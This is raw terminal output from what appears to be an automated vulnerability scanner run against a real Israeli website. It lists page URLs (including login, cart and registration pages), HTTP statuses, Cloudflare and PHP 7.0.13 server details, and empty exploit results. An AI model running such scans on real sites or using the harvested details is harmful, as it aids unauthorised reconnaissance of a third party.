- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 45 / 100 [1;37m][0;37m-[05:19:10][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/תע××€×-×תק××ת-××ך××¢××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 46 / 100 [1;37m][0;37m-[05:19:10][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××-×××-×× ×ךת-ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 47 / 100 [1;37m][0;37m-[05:19:11][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/blog/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 48 / 100 [1;37m][0;37m-[05:19:11][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-photos/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 49 / 100 [1;37m][0;37m-[05:19:12][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-videos/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 50 / 100 [1;37m][0;37m-[05:19:13][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/login/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 51 / 100 [1;37m][0;37m-[05:19:13][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/cart/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 52 / 100 [1;37m][0;37m-[05:19:15][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/contact/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 53 / 100 [1;37m][0;37m-[05:19:16][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/register/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 54 / 100 [1;37m][0;37m-[05:19:16][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/selected-package/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 55 / 100 [1;37m][0;37m-[05:19:17][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/health/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 56 / 100 [1;37m][0;37m-[05:19:19][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/logbook/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 57 / 100 [1;37m][0;37m-[05:19:19][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/ך×ש××-×× ×××××ך/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 58 / 100 [1;37m][0;37m-[05:19:20][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 59 / 100 [1;37m][0;37m-[05:19:21][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/test-popup/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 60 / 100 [1;37m][0;37m-[05:19:21][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/personal_details_coupon/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 61 / 100 [1;37m][0;37m-[05:19:22][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/ש××ך××-2/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 62 / 100 [1;37m][0;37m-[05:19:23][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/ש××ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 63 / 100 [1;37m][0;37m-[05:19:25][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/unsubsribe/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 64 / 100 [1;37m][0;37m-[05:19:26][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/custom-packages/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 65 / 100 [1;37m][0;37m-[05:19:26][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/gallery-press/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 66 / 100 [1;37m][0;37m-[05:19:27][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/forgot/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 67 / 100 [1;37m][0;37m-[05:19:28][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/category/news/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 68 / 100 [1;37m][0;37m-[05:19:28][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/choose-package/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 69 / 100 [1;37m][0;37m-[05:19:29][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/blackfriday/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 404 Not Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 70 / 100 [1;37m][0;37m-[05:19:29][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/contact-test/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 71 / 100 [1;37m][0;37m-[05:19:30][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/××-×××-×× ×ךת-ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 72 / 100 [1;37m][0;37m-[05:19:32][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/upsells/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 73 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/12/04/××ךק׊××-××ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 74 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/applied-coupon/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 75 / 100 [1;37m][0;37m-[05:19:33][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/11/25/××ךק׊××-×××-××ש׀××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 76 / 100 [1;37m][0;37m-[05:19:34][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/2016/12/12/××ךק׊××ת-××ך-×׊×××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 77 / 100 [1;37m][0;37m-[05:19:35][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/2016/12/04/××ךק׊××-××ך××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 78 / 100 [1;37m][0;37m-[05:19:35][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/test-popup/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 403 Forbidden, Server: cloudflare , IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 79 / 100 [1;37m][0;37m-[05:19:36][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/tag/×××-××××ש/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 80 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/en/gallery-photos/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
- [1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 [1;37m
- [1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[1;37m
- [1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
- [1;37m
- [1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
- [1;37m|_[ + ] [[1;37m 81 / 100 [1;37m][0;37m-[05:19:37][1;37m [ - ] [0m
- [1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m https://www.flybox.co.il/××××××-××¢××£-ש××/[1;37m ][0m
- [1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
